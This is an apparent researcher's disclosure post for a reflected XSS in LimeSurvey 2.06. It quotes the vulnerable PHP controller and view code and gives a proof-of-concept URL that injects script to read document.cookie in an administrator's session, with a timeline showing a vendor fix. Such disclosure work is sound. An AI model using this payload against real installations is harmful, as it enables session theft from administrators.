Kacper SzurekTagsPolishNewsletterAbout
YouTubeWebinaryFacebookTwitter
Kacper Szurek
TagsPolishNewsletterAboutYouTubeWebinaryFacebookTwitter
LimeSurvey 2.06 Build 160123 Reflected XSS

29-06-2016 / Vulnerabilities

LimeSurvey 2.06 Build 160123 Reflected XSS

$_GET['name'] is not escaped and then displayed inside pop_editor_view.

File: limesurvey\application\controllers\admin\htmleditor_pop.php

function index()
{
    Yii::app()->loadHelper('admin/htmleditor');
    $ckLanguage = sTranslateLangCode2CK(Yii::app()->session['adminlang']);
    $sFieldName = isset($_GET['name']) ? $_GET['name'] : 0;
    $sFieldText = isset($_GET['text']) ? $_GET['text'] : 0;
    $sFieldType = isset($_GET['type']) ? $_GET['type'] : 0;
    $sAction = isset($_GET['action']) ? $_GET['action'] : 0;
    $iSurveyId = isset($_GET['sid']) ? $_GET['sid'] : 0;
    $iGroupId = isset($_GET['gid']) ? $_GET['gid'] : 0;
    $iQuestionId = isset($_GET['qid']) ? $_GET['qid'] : 0;
    $sLanguage = isset($_GET['lang']) ? $_GET['lang'] : 0;
    $aData['sFieldName'] = $sFieldName;
    if (get_magic_quotes_gpc())
        $aData['sFieldText'] = $sFieldText = stripslashes($sFieldText);
    else
        $aData['sFieldText'] = $sFieldText;
    if (!$sFieldName || !$sFieldText)
    {
        $this->getController()->render('/admin/htmleditor/pop_nofields_view', $aData);
    }
    else
    {
        $aData['sFieldType'] = $sFieldType = preg_replace("/[^_.a-zA-Z0-9-]/", "", $sFieldType);
        $aData['sAction'] = preg_replace("/[^_.a-zA-Z0-9-]/", "", $sAction);
        $aData['iSurveyId'] = sanitize_int($iSurveyId);
        $aData['iGroupId'] = sanitize_int($iGroupId);
        $aData['iQuestionId'] = sanitize_int($iQuestionId);
        $aData['sControlIdEna'] = $sFieldName . '_popupctrlena';
        $aData['sControlIdDis'] = $sFieldName . '_popupctrldis';
        $aData['ckLanguage'] = $ckLanguage;
        $aData['toolbarname'] = 'popup';
        $aData['htmlformatoption'] = '';
        if (in_array($sFieldType, array('email-inv', 'email-reg', 'email-conf', 'email-rem')))
        {
            $aData['htmlformatoption'] = ',fullPage:true';
        }
        $this->getController()->render('/admin/htmleditor/pop_editor_view', $aData);
    }
}

File: limesurvey\application\views\admin\htmleditor\pop_editor_view.php

function close_editor()
{
    html_transfert();
    window.opener.document.getElementsByName('<?php echo $sFieldName; ?>')[0].readOnly= false;
    window.opener.document.getElementsByName('<?php echo $sFieldName; ?>')[0].className='htmlinput';
    window.opener.document.getElementById('<?php echo $sControlIdEna; ?>').style.display='';
    window.opener.document.getElementById('<?php echo $sControlIdDis; ?>').style.display='none';
    window.opener.focus();
    return true;
}

Proof of Concept

XSS will be visible for administrator:

http://limesurvey/index.php/admin/htmleditor_pop/sa/index?text=1&name=');}</script><img src=a onerror=alert(document.cookie)>

Timeline

  • 26-01-2016: Discovered
  • 26-01-2016: Vendor notified
  • 01-02-2016: Version 2.06+.160129 released, issue resolved